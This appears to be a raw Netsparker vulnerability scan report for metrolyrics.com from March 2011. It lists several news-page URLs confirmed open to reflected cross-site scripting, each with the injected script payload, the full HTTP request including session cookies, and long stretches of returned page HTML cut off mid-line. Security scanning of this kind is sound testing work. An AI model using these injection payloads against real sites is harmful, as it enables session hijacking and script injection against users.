<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460910?"></script>

<div id="header">

<h1>Carl Barat says Libertines won&#039;t perform at Glastonbury</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460910?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/maf.gif" alt="Carl Barat" width="166" />
<h2><a href="carl-barat-overview.html" title="Carl Barat Overview">Carl Barat</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=1298501804" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/carl-barat/1298501804/0">
<li><a title="Carl Barat Overview" href="/carl-barat-overview.html" >Overview</a></li>
<li><a title="Carl Barat News" href="/carl-barat-gossip-news.html" >News</a></li>
<li><a title="Carl Barat Awards" href="/carl-barat-awards-featured.html" >Awards</a></li>
<li><a title="Carl Barat Albums" href="/carl-barat-albums-list.html" >Albums</a></li>
<li><a title="Carl Barat Lyrics" href="/carl-barat-lyrics.html" >Lyrics</a></li>
<li><a title="Carl Barat Videos" href="/carl-barat-music-videos.html" >Videos</a></li>
<li><a title="Carl Barat Pictures" href="/carl-barat-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460910?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
<ul id="pollresults">
<li style="display:none"></li>
<li><input type="radio" name="poll" valu..
- /2011-miley-cyrus-plays-lindsay-lohan-on-snl-news.html

/2011-miley-cyrus-plays-lindsay-lohan-on-snl-news.html CONFIRMED

http://www.metrolyrics.com/2011-miley-cyrus-plays-lindsay-lohan-on-snl-news.html?'"--></style></scri..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000793)</script>

Request

GET /2011-miley-cyrus-plays-lindsay-lohan-on-snl-news.html?'"--></style></script><script>netsparker(0x000793)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10429
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:21:50 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Miley Cyrus plays Lindsay Lohan on SNL News about Miley Cyrus" />
<meta name="keywords" content="Miley Cyrus plays Lindsay Lohan on SNL" />
<meta property="fb:page_id" content="81914997331" />
<title>MILEY CYRUS PLAYS LINDSAY LOHAN ON SNL</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Miley Cyrus","sectionURL":"miley-cyrus-lyrics.html","title":"Miley Cyrus plays Lindsay Lohan on SNL"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460910?"></script>

<div id="header">

<h1>Miley Cyrus plays Lindsay Lohan on SNL</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460910?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/922016684MileyCyrusProfile.jpg" alt="Miley Cyrus" width="166" />
<h2><a href="miley-cyrus-overview.html" title="Miley Cyrus Overview">Miley Cyrus</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=922016684" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/miley-cyrus/922016684/0">
<li><a title="Miley Cyrus Overview" href="/miley-cyrus-overview.html" >Overview</a></li>
<li><a title="Miley Cyrus News" href="/miley-cyrus-gossip-news.html" >News</a></li>
<li><a title="Miley Cyrus Awards" href="/miley-cyrus-awards-featured.html" >Awards</a></li>
<li><a title="Miley Cyrus Albums" href="/miley-cyrus-albums-list.html" >Albums</a></li>
<li><a title="Miley Cyrus Lyrics" href="/miley-cyrus-lyrics.html" >Lyrics</a></li>
<li><a title="Miley Cyrus Videos" href="/miley-cyrus-music-videos.html" >Videos</a></li>
<li><a title="Miley Cyrus Pictures" href="/miley-cyrus-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460910?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
<ul id="pollresults">
<li style="display:none"></li>
<li><input type="radio" name="poll" value="5_18" />Yes! Love It</li><li><input type="radio&qu..
- /2011-rihanna-and-ciara-in-twitter-row-news.html

/2011-rihanna-and-ciara-in-twitter-row-news.html CONFIRMED

http://www.metrolyrics.com/2011-rihanna-and-ciara-in-twitter-row-news.html?'"--></style></script><sc..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000798)</script>

Request

GET /2011-rihanna-and-ciara-in-twitter-row-news.html?'"--></style></script><script>netsparker(0x000798)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10858
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:21:51 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Rihanna and Ciara in Twitter row News about Rihanna" />
<meta name="keywords" content="Rihanna and Ciara in Twitter row" />
<meta property="fb:page_id" content="81914997331" />
<title>RIHANNA AND CIARA IN TWITTER ROW</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Rihanna","sectionURL":"rihanna-lyrics.html","title":"Rihanna and Ciara in Twitter row"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460911?"></script>

<div id="header">

<h1>Rihanna and Ciara in Twitter row</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
